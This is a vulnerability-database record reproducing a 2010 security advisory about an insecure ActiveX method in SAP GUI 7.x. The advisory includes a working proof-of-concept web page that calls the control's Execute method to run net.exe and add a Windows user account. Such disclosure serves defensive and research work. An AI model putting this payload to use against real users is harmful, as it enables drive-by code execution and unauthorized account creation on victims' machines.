ID

VAR-E-201003-1727


EDB ID

11879


TITLE

SAP GUI 7.00 - BExGlobal Active-X unsecure method - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 11879

DESCRIPTION

SAP GUI 7.00 - BExGlobal Active-X unsecure method. CVE-64540 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 11879

AFFECTED PRODUCTS

vendor:sapmodel:guiscope:eqversion:7.00

Trust: 1.6

sources: EXPLOIT-DB: 11879 // EDBNET: 35513

EXPLOIT

Security vulnerability found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.

Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG

Description
***********

Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI.
One of the methods (Execute) can be used to execute files on users system.

Details
*******

Attacker can construct html page which call vulnerable function "Execute" from ActiveX Object BExGlobal.

Example (add user 'don_huan' with password 'p4ssW0rd'):
*******

<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>

<script language='Javascript'>
function init()
{
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);

}
init();
</script>
DSecRG
</html>

Fix Information
***************
All patches are available since December via note 1407285

References
**********

http://dsecrg.com/pages/vul/show.php?id=164
https://service.sap.com/sap/support/notes/1407285.

About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Trust: 1.0

sources: EXPLOIT-DB: 11879

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 11879

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 11879

TYPE

BExGlobal Active-X unsecure method

Trust: 1.6

sources: EXPLOIT-DB: 11879 // EDBNET: 35513

CREDITS

Alexey Sintsov

Trust: 0.6

sources: EXPLOIT-DB: 11879

EXTERNAL IDS

db:EXPLOIT-DBid:11879

Trust: 1.6

db:EDBNETid:35513

Trust: 0.6

sources: EXPLOIT-DB: 11879 // EDBNET: 35513

REFERENCES

url:https://www.exploit-db.com/exploits/11879/

Trust: 0.6

sources: EDBNET: 35513

SOURCES

db:EXPLOIT-DBid:11879
db:EDBNETid:35513

LAST UPDATE DATE

2022-07-27T09:59:23.121000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:11879date:2010-03-25T00:00:00
db:EDBNETid:35513date:2010-03-25T00:00:00